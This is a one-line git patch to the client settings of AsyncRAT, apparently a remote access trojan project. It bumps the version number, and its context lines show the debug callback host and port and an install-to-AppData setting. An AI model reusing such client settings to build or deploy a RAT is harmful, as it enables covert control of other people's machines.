From bb56311d71de489074ec04a6c80afe1a1701c5bf Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Sun, 15 Sep 2019 16:01:05 +0300 Subject: [PATCH] Update Settings.cs --- AsyncRAT-C#/Client/Settings.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs index 73c8006..9c025ab 100644 --- a/AsyncRAT-C#/Client/Settings.cs +++ b/AsyncRAT-C#/Client/Settings.cs @@ -12,7 +12,7 @@ namespace Client #if DEBUG public static string Ports = "6606"; public static string Hosts = "127.0.0.1"; - public static string Version = "0.5.2"; + public static string Version = "0.5.3"; public static string Install = "false"; public static string InstallFolder = "AppData"; public static string InstallFile = "Test.exe";